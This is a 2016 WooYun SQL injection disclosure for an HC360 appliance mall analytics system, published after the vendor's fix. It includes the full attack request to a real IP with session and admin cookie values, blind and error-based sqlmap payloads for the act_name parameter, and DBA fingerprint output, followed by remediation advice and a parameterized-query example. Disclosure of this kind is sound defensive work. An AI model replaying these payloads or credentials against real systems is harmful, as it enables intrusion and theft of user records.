
Vulnerability summary

Defect ID: wooyun-2016-0173397

Title: An HC360 (慧聪网) site has an SQL injection vulnerability involving 20,000+ user records (part 3)

Vendor: HC360 (慧聪网)

Author: pudding2

Submitted: 2016-01-28 17:55

Fixed: 2016-03-13 18:02

Published: 2016-03-13 18:02

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or assistance contact [email protected]



Vulnerability details

Disclosure status:

2016-01-28: Details reported to the vendor, awaiting vendor handling
2016-01-29: Vendor confirmed; details disclosed to the vendor only
2016-02-08: Details disclosed to core white hats and domain experts
2016-02-18: Details disclosed to regular white hats
2016-02-28: Details disclosed to intern white hats
2016-03-13: Details disclosed to the public

Brief description:

An HC360 site has an SQL injection vulnerability involving 20,000+ user records (part 3)

Detailed description:

Continued from: WooYun-2016-173045
The business analytics system of the HC360 Home Appliance Mall (慧聪家电城) has an SQL injection vulnerability; the largest user table contains 21,677 user records.
Vulnerable URL: http://58.252.73.136:8000/ActivityStatistics.aspx (business analytics system of the HC360 Home Appliance Mall)

[Screenshot: 4.jpg]

POST /ActivityStatistics.aspx HTTP/1.1
Host: 58.252.73.136:8000
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://58.252.73.136:8000/ActivityStatistics.aspx
Cookie: iconSize=16x16; _pk_id.9.1549=c5212d09a738e870.1453532641.2.1453863564.1453863325.; ECS[visit_times]=6; Hm_lvt_f8b4f3f9251c122a04fe1c11caba248c=1453532839,1453628139,1453703226,1453863154; ECS[display]=grid; _pk_id.5.1549=a8a501c4964f2499.1453532858.1.1453532858.1453532858.; Hm_lvt_fd16bacbe2d90b129666bbde3ee2b5c6=1453532858; DTRememberName=test; ECS_ID=929fee0bac53c1d567ab0cde7cda9af2da4aeae9; Hm_lpvt_f8b4f3f9251c122a04fe1c11caba248c=1453863181; AdminName=MxWeiXinPF=test; AdminPwd=MxWeiXinPF=2CF8FE5DCB0BC697; ASP.NET_SessionId=vpyihj1zxbl0srl2icrcws51; nowweixinId=MxWeiXinPF=29; _pk_ses.9.1549=*
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 4192

__VIEWSTATE=[long base64 __VIEWSTATE value omitted]&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=%2FwEWBQLQ%2B7OfCQLmyba8DQKvnKOtAQLo442vBQK7l6b7Cu8JAfiPq8YfBMS1qvd2w9f9T6zL8lXp4rNIql4MTX2W&act_name=1&goods_name=1&btnReport=%E6%90%9C%E7%B4%A2&AspNetPager_input=1


The injection point is act_name (POST); the database user is a DBA user.

Parameter: act_name (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: __VIEWSTATE=[__VIEWSTATE value omitted]&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=/wEWBQLQ+7OfCQLmyba8DQKvnKOtAQLo442vBQK7l6b7Cu8JAfiPq8YfBMS1qvd2w9f9T6zL8lXp4rNIql4MTX2W&act_name=1%' AND 3304=3304 AND '%'='&goods_name=1&btnReport=%E6%90%9C%E7%B4%A2&AspNetPager_input=1
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: __VIEWSTATE=[__VIEWSTATE value omitted]&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=/wEWBQLQ+7OfCQLmyba8DQKvnKOtAQLo442vBQK7l6b7Cu8JAfiPq8YfBMS1qvd2w9f9T6zL8lXp4rNIql4MTX2W&act_name=1%' AND (SELECT 5121 FROM(SELECT COUNT(*),CONCAT(0x7171767a71,(SELECT (ELT(5121=5121,1))),0x71627a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='&goods_name=1&btnReport=%E6%90%9C%E7%B4%A2&AspNetPager_input=1
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: MySQL 5.0
current user: 'jdmall_test@%'
current database: 'jdmall_test'
current user is DBA: True

Proof of vulnerability:

1. The database configuration file can be read to obtain the password and then dump the database (not going into that here)

[Screenshot: 5.jpg]

2. Database tables containing user records exist (the largest holds 21,677 users)

[Screenshot: 1.jpg]

[Screenshot: 2.jpg]

[Screenshot: 3.jpg]

Fix recommendations:

1. Filter input
2. The back end of this analytics system should not be directly reachable from the outside; at least add back-end authentication or block external access
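One way to implement the first fix item, as an added example that is not the vendor's code: the sqlmap payload above (`1%' AND 3304=3304 AND '%'='`) shows act_name being spliced into a `LIKE '%...%'` clause, so the snippet contrasts that concatenation with a parameterized MySqlCommand. The MySql.Data calls are real; the table name, column names and connection string are assumptions.

```csharp
// Added example, not the vendor's code. Assumes MySql.Data (MySqlConnection /
// MySqlCommand) and a hypothetical table "activity" with columns act_name,
// goods_name and sales, matching the two POST parameters the report shows.
using System;
using System.Collections.Generic;
using MySql.Data.MySqlClient;

public static class ActivityStatistics
{
    // VULNERABLE pattern implied by the report: the LIKE pattern is built by string
    // concatenation, so an input such as  1%' AND 3304=3304 AND '%'='  closes the
    // quoted literal and appends attacker-controlled SQL (boolean-based blind).
    public static string BuildVulnerableQuery(string actName, string goodsName)
    {
        return "SELECT act_name, goods_name, sales FROM activity " +
               "WHERE act_name LIKE '%" + actName + "%' " +
               "AND goods_name LIKE '%" + goodsName + "%'";
    }

    // FIXED: the SQL text is a constant; user input travels only as parameter
    // values. The % wildcards are added to the VALUE, not to the SQL string, so a
    // quote inside the input can never terminate the literal.
    public static List<string> QueryActivities(string connStr, string actName, string goodsName)
    {
        const string sql =
            "SELECT act_name, goods_name, sales FROM activity " +
            "WHERE act_name LIKE @actPattern AND goods_name LIKE @goodsPattern";

        var rows = new List<string>();
        using (var conn = new MySqlConnection(connStr))
        using (var cmd = new MySqlCommand(sql, conn))
        {
            cmd.Parameters.AddWithValue("@actPattern", "%" + actName + "%");
            cmd.Parameters.AddWithValue("@goodsPattern", "%" + goodsName + "%");
            conn.Open();
            using (var reader = cmd.ExecuteReader())
            {
                while (reader.Read())
                    rows.Add(reader.GetString(0) + " | " + reader.GetString(1));
            }
        }
        return rows;
    }
}
```

Parameterization stops quote-based injection but does not stop a caller from supplying their own `%` or `_` wildcards, and it does nothing about the connection running as a DBA account (the report's "current user is DBA: True"), which is a separate least-privilege fix on the connection string's database user.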

Copyright notice: please credit the source when reposting: pudding2@WooYun


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 8

Confirmed at: 2016-01-29 10:45

Vendor reply:

Thank you

Latest status:

None yet

